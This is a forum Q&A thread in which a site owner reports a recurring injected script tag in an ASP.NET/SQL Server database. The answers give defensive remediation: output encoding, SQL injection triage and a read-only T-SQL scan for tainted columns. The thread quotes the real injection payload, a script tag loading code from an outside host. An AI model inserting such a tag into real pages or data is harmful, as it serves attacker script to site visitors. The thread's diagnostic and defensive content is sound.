
XSS Attack on the ASP.NET Website [closed]

I am in very big trouble. Please help!!!!!!!!!!

My website has been attacked by some malicious script `</title><script src=http://google-stats50.info/ur.php>`. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is `</title><script src=http://google-stats49.info/ur.php>`.

My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.

Please help.

Thanks in advance!!!!!!

user423719 asked Sep 23 '10 06:09


2 Answers

When you render the text from the database you can use two ways to avoid this script.

  1. Use `Server.HtmlEncode(DataFromDatabase);`
  2. Use the Microsoft Anti-Cross dll library, which has a similar function with more options.

The latest MS Anti-XSS library is now 3.1.
How-to video

How they pass this script:

  1. On the contact or other forms.
  2. On the browser reference in the statistics: when they browse your site, you keep a log about this, and when you go to view this log the script runs.

Hope this helps.

Aristos answered Sep 27 '22 16:09


Shut down the site. Your server may or may not be screwed now.

You have to find out where the changes are coming from - Database or File system

If it's the DB then you may be ok, someone is probably using sql injection. Set permissions so that the DB cannot be updated by the site for now until you find the SQL INJECTION point.

If it's your file system then you probably need to clear and reset the site. They are in and you won't get rid of them. Find your entry point, but it will be hard.

Dan answered Sep 27 '22 16:09
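
The database side of the triage described in the second answer, as an added example that is not part of either answer: a read-only T-SQL scan that reports which character columns in the current database contain an injected tag and how many rows are affected. The `<script` search pattern is an assumption based on the string quoted in the question, and the script uses only features available in SQL Server 2005.

```sql
-- Added example: list every character column in the current database that
-- contains "<script", with the number of affected rows. Read-only.
-- Assumption: the injected value contains "<script" (as quoted in the question).
-- Matching is case-insensitive under the default collation.
SET NOCOUNT ON;

DECLARE @hits TABLE (
    SchemaName sysname,
    TableName  sysname,
    ColumnName sysname,
    BadRows    int
);

DECLARE @schema sysname, @table sysname, @column sysname, @sql nvarchar(4000), @n int;

DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;

WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME keeps unusual identifiers from breaking the dynamic statement.
    SET @sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE ''%<script%''';
    EXEC sp_executesql @sql, N'@n int OUTPUT', @n = @n OUTPUT;

    IF @n > 0
        INSERT INTO @hits VALUES (@schema, @table, @column, @n);

    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END

CLOSE col_cursor;
DEALLOCATE col_cursor;

-- Most heavily affected columns first.
SELECT SchemaName, TableName, ColumnName, BadRows
FROM @hits
ORDER BY BadRows DESC;
```

Running it again after a cleanup shows whether the tag has reappeared and in which tables, which narrows down the pages and queries that write to those columns.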